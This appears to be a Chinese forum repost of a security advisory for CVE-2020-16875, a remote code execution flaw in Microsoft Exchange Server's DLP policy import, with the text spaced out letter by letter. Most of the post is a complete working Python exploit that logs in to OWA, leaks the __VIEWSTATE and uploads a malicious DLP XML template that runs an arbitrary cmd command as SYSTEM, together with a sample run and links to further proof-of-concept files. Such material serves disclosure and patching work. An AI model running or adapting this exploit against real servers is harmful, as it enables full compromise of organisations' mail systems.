搜索

[1116] 2020-09-14_CVE-2020-16875MicrosoftExchangeServer远程执行代码漏洞

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-16
2020-09-14_CVE-2020-16875MicrosoftExchangeServer远程执行代码漏洞 C V E - 2 0 2 0 - 1 6 8 7 5   |   M i c r o s o f t   E x c h a n g e   S e r v e r S t e v e n   S e e l e y   C h a B u g   2 0 2 0 - 0 9 - 1 4 M i c r o s o f t   E x c h a n g e   S e r v e r   D l p U t i l s   A d d T e n a n t D l p P o l i c y   R e m o t e   C o d e   E x e c u t i o n   V u l n e r a b i l i t y P a t c h : h t t p s : / / p o r t a l . m s r c . m i c r o s o f t . c o m / e n - u s / s e c u r i t y - g u i d a n c e / a d v i s o r y / C V E - 2 0 2 0 - 1 6 8 7 5 N O T E S : D a t a   L o s s   P r e v e n t i o n [ P S ]   C : W i n d o w s s y s t e m 3 2 > N e w - R o l e G r o u p   - N a m e   " d l p   u s e r s "   - R o l e s   " D a t a   L o s s   P r e v e n t i o n "   - M e m b e r s " h a r r y m " N a m e           A s s i g n e d R o l e s                   R o l e A s s i g n m e n t s                                   M a n a g e d B y - - - -           - - - - - - - - - - - - -                   - - - - - - - - - - - - - - -                                   - - - - - - - - - d l p   u s e r s   { D a t a   L o s s   P r e v e n t i o n }   { D a t a   L o s s   P r e v e n t i o n - d l p   u s e r s }   { e x c h a n g e d e m o . c o m / M i c r o s o f t   E x c h a n g e S e c u r i t y   G r o u p s / O r g a n i z a t i o n   M a n a g e m e n t ,   e x c h a n g e d e m o . c o m / U s e r s / t e s t } [ P S ]   C : W i n d o w s s y s t e m 3 2 > G e t - R o l e G r o u p   " d l p   u s e r s "   |   F o r m a t - L i s t R u n s p a c e I d                                   :   0 9 8 e 1 1 4 0 - 3 0 e 3 - 4 1 4 4 - 8 0 2 8 - 2 1 7 4 f d b 4 3 b 8 5 M a n a g e d B y                                       :   { e x c h a n g e d e m o . c o m / M i c r o s o f t   E x c h a n g e   S e c u r i t y   G r o u p s / O r g a n i z a t i o n M a n a g e m e n t ,   e x c h a n g e d e m o . c o m / U s e r s / t e s t } R o l e A s s i g n m e n t s                           :   { D a t a   L o s s   P r e v e n t i o n - d l p   u s e r s } R o l e s                                               :   { D a t a   L o s s   P r e v e n t i o n } D i s p l a y N a m e                                   : E x t e r n a l D i r e c t o r y O b j e c t I d       : M e m b e r s                                           :   { e x c h a n g e d e m o . c o m / U s e r s / H a r r y   M u l l } S a m A c c o u n t N a m e                           :   d l p   u s e r s D e s c r i p t i o n                                   : R o l e G r o u p T y p e                               :   S t a n d a r d L i n k e d G r o u p                                   : C a p a b i l i t i e s                               :   { } L i n k e d P a r t n e r G r o u p I d               : L i n k e d P a r t n e r O r g a n i z a t i o n I d   : I d e n t i t y                                       :   e x c h a n g e d e m o . c o m / M i c r o s o f t   E x c h a n g e   S e c u r i t y   G r o u p s / d l p   u s e r s I s V a l i d                                           :   T r u e E x c h a n g e V e r s i o n                           :   0 . 1 0   ( 1 4 . 0 . 1 0 0 . 0 )
N a m e                                               :   d l p   u s e r s D i s t i n g u i s h e d N a m e                       :   C N = d l p   u s e r s , O U = M i c r o s o f t   E x c h a n g e   S e c u r i t y   G r o u p s , D C = e x c h a n g e d e m o , D C = c o m G u i d                                               :   f a 5 c 8 4 5 8 - 8 2 5 5 - 4 f f d - b 1 2 8 - 2 a 6 6 b f 9 d b f d 6 O b j e c t C a t e g o r y                           :   e x c h a n g e d e m o . c o m / C o n f i g u r a t i o n / S c h e m a / G r o u p O b j e c t C l a s s                                   :   { t o p ,   g r o u p } W h e n C h a n g e d                                   :   6 / 1 2 / 2 0 2 0   1 1 : 2 9 : 3 1   P M W h e n C r e a t e d                                   :   6 / 1 2 / 2 0 2 0   1 1 : 2 9 : 3 1   P M W h e n C h a n g e d U T C                           :   6 / 1 2 / 2 0 2 0   3 : 2 9 : 3 1   P M W h e n C r e a t e d U T C                           :   6 / 1 2 / 2 0 2 0   3 : 2 9 : 3 1   P M O r g a n i z a t i o n I d                           : I d                                                   :   e x c h a n g e d e m o . c o m / M i c r o s o f t   E x c h a n g e   S e c u r i t y   G r o u p s / d l p   u s e r s O r i g i n a t i n g S e r v e r                       :   D E A D 0 1 . e x c h a n g e d e m o . c o m O b j e c t S t a t e                                   :   C h a n g e d 使 : r e s e a r c h e r @ i n c i t e : ~ $   . / p o c . p y ( + )   u s a g e :   . / p o c . p y   < t a r g e t >   < u s e r : p a s s >   < c m d > ( + )   e g :   . / p o c . p y   1 9 2 . 1 6 8 . 7 5 . 1 4 2   h a r r y m @ e x c h a n g e d e m o . c o m : u s e r 1 2 3 # # #   m s p a i n t r e s e a r c h e r @ i n c i t e : ~ $   . / p o c . p y   1 9 2 . 1 6 8 . 7 5 . 1 4 2   h a r r y m @ e x c h a n g e d e m o . c o m : u s e r 1 2 3 # # #   m s p a i n t ( + )   l o g g e d   i n   a s   h a r r y m @ e x c h a n g e d e m o . c o m ( + )   f o u n d   t h e   _ _ v i e w s t a t e :   / w E P D w U I L T g 5 M D A z M D F k Z F A e y P S 7 / e B J 4 l P N R N P B j m 8 Q i W L W n i r Q 1 v s G l S y j V x a 5 ( + )   e x e c u t e d   m s p a i n t   a s   S Y S T E M ! # ! / u s r / b i n / e n v   p y t h o n 3 i m p o r t   r e i m p o r t   s y s i m p o r t   r a n d o m i m p o r t   s t r i n g i m p o r t   u r l l i b 3 i m p o r t   r e q u e s t s u r l l i b 3 . d i s a b l e _ w a r n i n g s ( u r l l i b 3 . e x c e p t i o n s . I n s e c u r e R e q u e s t W a r n i n g ) d e f   r a n d o m _ s t r i n g ( s t r _ l e n = 8 ) :     l e t t e r s   =   s t r i n g . a s c i i _ l o w e r c a s e     r e t u r n   ' ' . j o i n ( r a n d o m . c h o i c e ( l e t t e r s )   f o r   i   i n   r a n g e ( s t r _ l e n ) ) d e f   g e t _ x m l ( c ) :     r e t u r n   " " " < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < d l p P o l i c y T e m p l a t e s > < d l p P o l i c y T e m p l a t e   i d = " F 7 C 2 9 A E C - A 5 2 D - 4 5 0 2 - 9 6 7 0 - 1 4 1 4 2 4 A 8 3 F A B "   m o d e = " A u d i t "   s t a t e = " E n a b l e d " v e r s i o n = " 1 5 . 0 . 2 . 0 " >     < c o n t e n t V e r s i o n > 4 < / c o n t e n t V e r s i o n >     < p u b l i s h e r N a m e > s i < / p u b l i s h e r N a m e >     < n a m e >         < l o c a l i z e d S t r i n g   l a n g = " e n " > < / l o c a l i z e d S t r i n g >     < / n a m e >     < d e s c r i p t i o n >         < l o c a l i z e d S t r i n g   l a n g = " e n " > < / l o c a l i z e d S t r i n g >
    < / d e s c r i p t i o n >     < k e y w o r d s > < / k e y w o r d s >     < r u l e P a r a m e t e r s > < / r u l e P a r a m e t e r s >     < p o l i c y C o m m a n d s >         < c o m m a n d B l o c k >             < ! [ C D A T A [   $ i = N e w - o b j e c t S y s t e m . D i a g n o s t i c s . P r o c e s s S t a r t I n f o ; $ i . U s e S h e l l E x e c u t e = $ t r u e ; $ i . F i l e N a m e = " c m d " ; $ i . A r g u m e n t s = " / c % s " ; $ r = N e w - O b j e c t   S y s t e m . D i a g n o s t i c s . P r o c e s s ; $ r . S t a r t I n f o = $ i ; $ r . S t a r t ( )   ] ] >         < / c o m m a n d B l o c k >     < / p o l i c y C o m m a n d s >     < p o l i c y C o m m a n d s R e s o u r c e s > < / p o l i c y C o m m a n d s R e s o u r c e s > < / d l p P o l i c y T e m p l a t e > < / d l p P o l i c y T e m p l a t e s > " " "   %   c d e f   t r i g g e r _ r c e ( t ,   s ,   v s ,   c m d ) :     f   =   {             ' _ _ V I E W S T A T E ' :   ( N o n e ,   v s ) ,             ' c t l 0 0 $ R e s u l t P a n e P l a c e H o l d e r $ s e n d e r B t n ' :   ( N o n e ,   " R e s u l t P a n e P l a c e H o l d e r _ B u t t o n s P a n e l _ b t n N e x t " ) ,             ' c t l 0 0 $ R e s u l t P a n e P l a c e H o l d e r $ c o n t e n t C o n t a i n e r $ n a m e ' :   ( N o n e ,   r a n d o m _ s t r i n g ( ) ) ,             ' c t l 0 0 $ R e s u l t P a n e P l a c e H o l d e r $ c o n t e n t C o n t a i n e r $ u p l d C t r l ' :   ( " d l p r c e . x m l " ,   g e t _ x m l ( c m d ) ) ,     }     r   =   s . p o s t ( " h t t p s : / / % s / e c p / D L P P o l i c y / M a n a g e P o l i c y F r o m I S V . a s p x "   %   t ,   f i l e s = f ,   v e r i f y = F a l s e )     a s s e r t   r . s t a t u s _ c o d e   = =   2 0 0 ,   " ( - )   f a i l e d   t o   t r i g g e r   r c e ! " d e f   l e a k _ v i e w s t a t e ( t ,   s ) :     r   =   s . g e t ( " h t t p s : / / % s / e c p / D L P P o l i c y / M a n a g e P o l i c y F r o m I S V . a s p x "   %   t ,   v e r i f y = F a l s e )     m a t c h   =   r e . s e a r c h ( " < i n p u t   t y p e = " h i d d e n "   n a m e = " _ _ V I E W S T A T E "   i d = " _ _ V I E W S T A T E "   v a l u e = " ( . * ) "   / > " , r . t e x t )     a s s e r t   m a t c h   ! =   N o n e ,   " ( - )   c o u l d n ' t   l e a k   t h e   _ _ v i e w s t a t e ! "     r e t u r n   m a t c h . g r o u p ( 1 )       d e f   l o g _ i n ( t ,   u s r ,   p w d ) :     s   =   r e q u e s t s . S e s s i o n ( )     d   =   {             " d e s t i n a t i o n "   :   " h t t p s : / / % s / o w a "   %   t ,             " f l a g s "   :   " " ,             " u s e r n a m e "   :   u s r ,             " p a s s w o r d "   :   p w d     }     s . p o s t ( " h t t p s : / / % s / o w a / a u t h . o w a "   %   t ,   d a t a = d ,   v e r i f y = F a l s e )     a s s e r t   s . c o o k i e s . g e t ( n a m e = ' X - O W A - C A N A R Y ' )   ! =   N o n e ,   " ( - )   c o u l d n ' t   l e a k   t h e   c s r f   c a n a r y ! "     r e t u r n   s d e f   m a i n ( t ,   u s r ,   p w d ,   c m d ) :     s   =   l o g _ i n ( t ,   u s r ,   p w d )     p r i n t ( " ( + )   l o g g e d   i n   a s   % s "   %   u s r )     v s   =   l e a k _ v i e w s t a t e ( t ,   s )     p r i n t ( " ( + )   f o u n d   t h e   _ _ v i e w s t a t e :   % s "   %   v s )     t r i g g e r _ r c e ( t ,   s ,   v s ,   c m d )     p r i n t ( " ( + )   e x e c u t e d   % s   a s   S Y S T E M ! "   %   c m d ) i f   _ _ n a m e _ _   = =   ' _ _ m a i n _ _ ' :     i f   l e n ( s y s . a r g v )   ! =   4 :             p r i n t ( " ( + )   u s a g e :   % s   < t a r g e t >   < u s e r : p a s s >   < c m d > "   %   s y s . a r g v [ 0 ] )             p r i n t ( " ( + )   e g :   % s   1 9 2 . 1 6 8 . 7 5 . 1 4 2   h a r r y m @ e x c h a n g e d e m o . c o m : u s e r 1 2 3 # # #   m s p a i n t "   %   s y s . a r g v [ 0 ] )             s y s . e x i t ( - 1 )     t r g t   =   s y s . a r g v [ 1 ]     a s s e r t   " : "   i n   s y s . a r g v [ 2 ] ,   " ( - )   y o u   n e e d   a   u s e r   a n d   p a s s w o r d ! "     u s r   =   s y s . a r g v [ 2 ] . s p l i t ( " : " ) [ 0 ]     p w d   =   s y s . a r g v [ 2 ] . s p l i t ( " : " ) [ 1 ]     c m d   =   s y s . a r g v [ 3 ]     m a i n ( t r g t ,   u s r ,   p w d ,   c m d ) p o c   ( p s - r e m o t i n g ) :   h t t p s : / / s r c i n c i t e . i o / p o c s / c v e - 2 0 2 0 - 1 6 8 7 5 . p s 1 . t x t
p o c   ( h t t p ) :   h t t p s : / / s r c i n c i t e . i o / p o c s / c v e - 2 0 2 0 - 1 6 8 7 5 . p y . t x t
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理